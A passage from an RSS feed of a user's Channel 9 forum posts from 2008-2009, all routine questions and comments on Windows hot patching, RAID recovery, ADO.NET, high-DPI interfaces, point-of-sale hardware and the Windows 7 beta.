patching]</title><description>&lt;p&gt;&lt;em&gt;&lt;strong&gt;"Hot patching&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;One of my own personal favorites is the hot patching feature that allows you to patch your system binaries even if they are currently in use. By actually patching the binaries in memory, this new feature will significantly reduce the number of reboots required for hotfixes. You will still need to reboot after updating kernel-level binaries, but as always, the fewer reboots the better."&lt;br /&gt;&lt;/em&gt;From &lt;a href="http://www.securityfocus.com/columnists/312"&gt;http://www.securityfocus.com/columnists/312&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Is this technology actually being used? I still have to reboot my pc after WindowsUpdate installs new updates and I don't think we've seen a kernel update every month.&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/469502-Hot-patching/'&gt;Hot patching&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/469502/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/469502-Hot-patching/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/469502-Hot-patching/</link><pubDate>Sat, 16 May 2009 14:31:00 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/469502-Hot-patching/</guid><evnet:views>1550</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/469502/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>"Hot patchingOne of my own personal favorites is the hot patching feature that allows you to patch your system binaries even if they are currently in use. By actually patching the binaries in memory, this new feature will significantly reduce the number of reboots required for hotfixes. You will&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>7</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/469502-Hot-patching/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/469502/Trackback.aspx</trackback:ping></item><item><title>Raid 5 issues [Raid 5 issues]</title><description>Last week one of my 3 hd's died in the array. Yesterday I got my replacement but rebuilding the array didn't work for some reason in the Mediashield (raid)&amp;nbsp;bios. It kept giving errors so as a last resort I deleted the array, created a new one, added all the drives and select my new drive to be rebuilt.&lt;BR&gt;Problem is, diskmanager in Windows wants to initialize the drive and put a MBR or GPT on it. I guess all my data is screwed up now or is there a recovery application that can extract and combine data from the 2 drives or recreate the partition table like it was before?&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/466461-Raid-5-issues/'&gt;Raid 5 issues&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/466461/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/466461-Raid-5-issues/</comments><link>http://channel9.msdn.com/forums/TechOff/466461-Raid-5-issues/</link><pubDate>Thu, 23 Apr 2009 08:18:52 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/466461-Raid-5-issues/</guid><evnet:views>583</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/466461/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>Last week one of my 3 hd's died in the array. Yesterday I got my replacement but rebuilding the array didn't work for some reason in the Mediashield (raid)&amp;nbsp;bios. It kept giving errors so as a last resort I deleted the array, created a new one, added all the drives and select my new drive to be&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>2</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/466461-Raid-5-issues/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/466461/Trackback.aspx</trackback:ping></item><item><title>ADO.NET Data Services weirdness [ADO.NET Data Services weirdness]</title><description>I'm trying to get retrieve all the rows from an Azure table. The weird thing is that after following all the examples from the web I'm getting errors but no rows. However with Azure Storage Explorer I was able to look at my table and see the rows.&lt;BR&gt;Using Wireshark I saw what was happening in the background:&lt;BR&gt;&lt;BR&gt;Azure Storage Explorer: GET /Exercises HTTP/1.1&lt;BR&gt;My app: GET /Exercises() HTTP/1.1&lt;BR&gt;&lt;BR&gt;Why is it putting these brackets in there?&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/462190-ADONET-Data-Services-weirdness/'&gt;ADO.NET Data Services weirdness&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/462190/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/462190-ADONET-Data-Services-weirdness/</comments><link>http://channel9.msdn.com/forums/TechOff/462190-ADONET-Data-Services-weirdness/</link><pubDate>Tue, 24 Mar 2009 12:46:15 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/462190-ADONET-Data-Services-weirdness/</guid><evnet:views>814</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/462190/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I'm trying to get retrieve all the rows from an Azure table. The weird thing is that after following all the examples from the web I'm getting errors but no rows. However with Azure Storage Explorer I was able to look at my table and see the rows.Using Wireshark I saw what was happening in the&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>2</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/462190-ADONET-Data-Services-weirdness/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/462190/Trackback.aspx</trackback:ping></item><item><title>Remove the Youtube functionality [Remove the Youtube functionality]</title><description>Some idiot is abusing this feature yet again and since we don't have the spam button to bury his post I vote to remove the ability to add Youtube videos to a post.&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Feedback/460467-Remove-the-Youtube-functionality/'&gt;Remove the Youtube functionality&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/460467/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Feedback/460467-Remove-the-Youtube-functionality/</comments><link>http://channel9.msdn.com/forums/Feedback/460467-Remove-the-Youtube-functionality/</link><pubDate>Wed, 11 Mar 2009 11:31:15 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Feedback/460467-Remove-the-Youtube-functionality/</guid><evnet:views>595</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/460467/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>Some idiot is abusing this feature yet again and since we don't have the spam button to bury his post I vote to remove the ability to add Youtube videos to a post.in reply to Remove the Youtube functionality</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>2</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Feedback/460467-Remove-the-Youtube-functionality/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/460467/Trackback.aspx</trackback:ping></item><item><title>QuakeLive - Who else is waiting in line? [QuakeLive - Who else is waiting in line?]</title><description>&lt;A href="http://www.quakelive.com/"&gt;http://www.quakelive.com&lt;/A&gt;
&lt;P&gt;It just went open for public beta. Registration went without a problem but now I'm waiting in the queue place&amp;nbsp;31127.&lt;BR&gt;&lt;BR&gt;&lt;EM&gt;"You will automatically move on to the site when it's your turn. Technology is so cool."&lt;/EM&gt;&lt;/P&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/458701-QuakeLive-Who-else-is-waiting-in-line/'&gt;QuakeLive - Who else is waiting in line?&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/458701/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/458701-QuakeLive-Who-else-is-waiting-in-line/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/458701-QuakeLive-Who-else-is-waiting-in-line/</link><pubDate>Wed, 25 Feb 2009 01:27:52 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/458701-QuakeLive-Who-else-is-waiting-in-line/</guid><evnet:views>712</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/458701/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>http://www.quakelive.com
It just went open for public beta. Registration went without a problem but now I'm waiting in the queue place&amp;nbsp;31127."You will automatically move on to the site when it's your turn. Technology is so cool."in reply to QuakeLive - Who else is waiting in line?</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>7</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/458701-QuakeLive-Who-else-is-waiting-in-line/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/458701/Trackback.aspx</trackback:ping></item><item><title>Need advice - IT in a store [Need advice - IT in a store]</title><description>I made an application for a store. I imported the customers, products into the database and did the inventory in the past week. Now I'm making the point of sale program and the store will be ready to go when that's finished. However, until now I've only been using the store owner's laptop which is obviously not so good.&lt;BR&gt;&lt;BR&gt;I was thinking about buying a server from Dell with Windows Small Business Server 2008 Premium (because of SQL server), another desktop PC (for inserting new products and printing&amp;nbsp;reports/labels)&amp;nbsp;and a point of sale pc with a touch screen. This setup should definately work but when looking at the price of SBS (1300 €) I'm starting to doubt if&amp;nbsp;I really need it. For now SQL Server Express 2008 works fine: I've got about 2000 customers, 5000 products in the db, reporting services works fine. I think it will take a while for the db to hit any limits. So change of plans:&lt;BR&gt;Buy a desktop pc (Vista Business) which will also act as the database server (SQL Server Express 2008). A user will only use&amp;nbsp;the pc/server&amp;nbsp;for inserting new products and printing&amp;nbsp;labels. The pc should have a raid 1 array, UPS and a backup device. The POS pc will connect to it via a switch and occasionally the current laptop. If the database starts hitting the limits of the Express version I could buy the server with SBS 2008 and move the database to that one.&lt;BR&gt;&lt;BR&gt;Any advice on my ideas? The backup device, since the database is only 10 MB at the moment&amp;nbsp;I assume a tape backup is overkill. Should I use a CD-R(W), external HD or a simple USB stick?&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/455603-Need-advice-IT-in-a-store/'&gt;Need advice - IT in a store&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/455603/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/455603-Need-advice-IT-in-a-store/</comments><link>http://channel9.msdn.com/forums/TechOff/455603-Need-advice-IT-in-a-store/</link><pubDate>Thu, 29 Jan 2009 22:47:29 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/455603-Need-advice-IT-in-a-store/</guid><evnet:views>1033</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/455603/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I made an application for a store. I imported the customers, products into the database and did the inventory in the past week. Now I'm making the point of sale program and the store will be ready to go when that's finished. However, until now I've only been using the store owner's laptop which is&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>11</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/455603-Need-advice-IT-in-a-store/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/455603/Trackback.aspx</trackback:ping></item><item><title>Windows 7, High DPI, blurry interface [Windows 7, High DPI, blurry interface]</title><description>I've set the DPI setting at 150% and I noticed some applications have a blurry interface. I thought I was safe because I've put the scalingmode on my application's mainform on DPI but my application is now blurry too.&lt;BR&gt;What do I have to do to make my application's interface sharp again?&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/453250-Windows-7-High-DPI-blurry-interface/'&gt;Windows 7, High DPI, blurry interface&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/453250/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/453250-Windows-7-High-DPI-blurry-interface/</comments><link>http://channel9.msdn.com/forums/TechOff/453250-Windows-7-High-DPI-blurry-interface/</link><pubDate>Wed, 14 Jan 2009 14:23:34 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/453250-Windows-7-High-DPI-blurry-interface/</guid><evnet:views>730</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/453250/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I've set the DPI setting at 150% and I noticed some applications have a blurry interface. I thought I was safe because I've put the scalingmode on my application's mainform on DPI but my application is now blurry too.What do I have to do to make my application's interface sharp again?in reply to&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>1</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/453250-Windows-7-High-DPI-blurry-interface/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/453250/Trackback.aspx</trackback:ping></item><item><title>Programmatically setting data in a bindingsource [Programmatically setting data in a bindingsource]</title><description>I've got a form with a bindingsource, 2 textboxes (PostalCode and City) are bound to the bindingsource. When the user inserts a postalcode and inserted 4 characters I retrieve a list of cities from the database based on that code. If there is at least 1 result I set the first result in the City textbox ( txtCity.Text = CityList(0) ). This works like it should but when I 'tab' into the City textbox, the text disappears.&lt;BR&gt;I guess it's because the value did not get into the bindingsource and got discarded when the City textbox received focus.&lt;BR&gt;Is there any solution to prevent this?&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/452894-Programmatically-setting-data-in-a-bindingsource/'&gt;Programmatically setting data in a bindingsource&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/452894/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/452894-Programmatically-setting-data-in-a-bindingsource/</comments><link>http://channel9.msdn.com/forums/TechOff/452894-Programmatically-setting-data-in-a-bindingsource/</link><pubDate>Mon, 12 Jan 2009 23:22:00 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/452894-Programmatically-setting-data-in-a-bindingsource/</guid><evnet:views>572</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/452894/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I've got a form with a bindingsource, 2 textboxes (PostalCode and City) are bound to the bindingsource. When the user inserts a postalcode and inserted 4 characters I retrieve a list of cities from the database based on that code. If there is at least 1 result I set the first result in the City&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>2</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/452894-Programmatically-setting-data-in-a-bindingsource/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/452894/Trackback.aspx</trackback:ping></item><item><title>What do you want to see on Channel 9 in 2009? [What do you want to see on Channel 9 in 2009?]</title><description>I made&amp;nbsp;a wiki, feel free to add your ideas.&lt;BR&gt;&lt;BR&gt;&lt;A href="http://channel9.msdn.com/Wiki/Channel09/"&gt;http://channel9.msdn.com/Wiki/Channel09/&lt;/A&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/450445-What-do-you-want-to-see-on-Channel-9-in-2009/'&gt;What do you want to see on Channel 9 in 2009?&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/450445/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/450445-What-do-you-want-to-see-on-Channel-9-in-2009/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/450445-What-do-you-want-to-see-on-Channel-9-in-2009/</link><pubDate>Wed, 31 Dec 2008 00:07:32 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/450445-What-do-you-want-to-see-on-Channel-9-in-2009/</guid><evnet:views>559</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/450445/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I made&amp;nbsp;a wiki, feel free to add your ideas.http://channel9.msdn.com/Wiki/Channel09/in reply to What do you want to see on Channel 9 in 2009?</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>6</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/450445-What-do-you-want-to-see-on-Channel-9-in-2009/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/450445/Trackback.aspx</trackback:ping></item><item><title>Windows 7 beta invitations sent [Windows 7 beta invitations sent]</title><description>whoohoooow! :)&lt;BR&gt;&lt;BR&gt;Check your email.&lt;BR&gt;&lt;BR&gt;&lt;A href="http://www.neowin.net/news/main/08/12/17/new-windows-7-beta-released-to-select-testers"&gt;http://www.neowin.net/news/main/08/12/17/new-windows-7-beta-released-to-select-testers&lt;/A&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/448926-Windows-7-beta-invitations-sent/'&gt;Windows 7 beta invitations sent&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/448926/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/448926-Windows-7-beta-invitations-sent/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/448926-Windows-7-beta-invitations-sent/</link><pubDate>Wed, 17 Dec 2008 22:16:26 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/448926-Windows-7-beta-invitations-sent/</guid><evnet:views>1955</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/448926/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>whoohoooow! :)Check your email.http://www.neowin.net/news/main/08/12/17/new-windows-7-beta-released-to-select-testersin reply to Windows 7 beta invitations sent</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>39</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/448926-Windows-7-beta-invitations-sent/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/448926/Trackback.aspx</trackback:ping></item><item><title>IE patch is out [IE patch is out]</title><description>&lt;P&gt;Just found it on WindowsUpdate.&lt;BR&gt;&lt;BR&gt;&lt;A href="http://www.microsoft.com/technet/security/advisory/961051.mspx"&gt;http://www.microsoft.com/technet/security/advisory/961051.mspx&lt;/A&gt;&lt;/P&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/448898-IE-patch-is-out/'&gt;IE patch is out&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/448898/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/448898-IE-patch-is-out/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/448898-IE-patch-is-out/</link><pubDate>Wed, 17 Dec 2008 19:14:48 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/448898-IE-patch-is-out/</guid><evnet:views>933</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/448898/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>Just found it on WindowsUpdate.http://www.microsoft.com/technet/security/advisory/961051.mspxin reply to IE patch is out</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>5</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/448898-IE-patch-is-out/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/448898/Trackback.aspx</trackback:ping></item><item><title>Nit pick of the week [Nit pick of the week]</title><description>Pick a thread with multiple pages, go to the second/third/last page. Notice that the link and tooltip of a user's image still refers to the profile of someone else.&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Feedback/448224-Nit-pick-of-the-week/'&gt;Nit pick of the week&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/448224/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Feedback/448224-Nit-pick-of-the-week/</comments><link>http://channel9.msdn.com/forums/Feedback/448224-Nit-pick-of-the-week/</link><pubDate>Fri, 12 Dec 2008 20:53:30 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Feedback/448224-Nit-pick-of-the-week/</guid><evnet:views>563</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/448224/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>Pick a thread with multiple pages, go to the second/third/last page. Notice that the link and tooltip of a user's image still refers to the profile of someone else.in reply to Nit pick of the week</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>2</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Feedback/448224-Nit-pick-of-the-week/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/448224/Trackback.aspx</trackback:ping></item></channel></rss>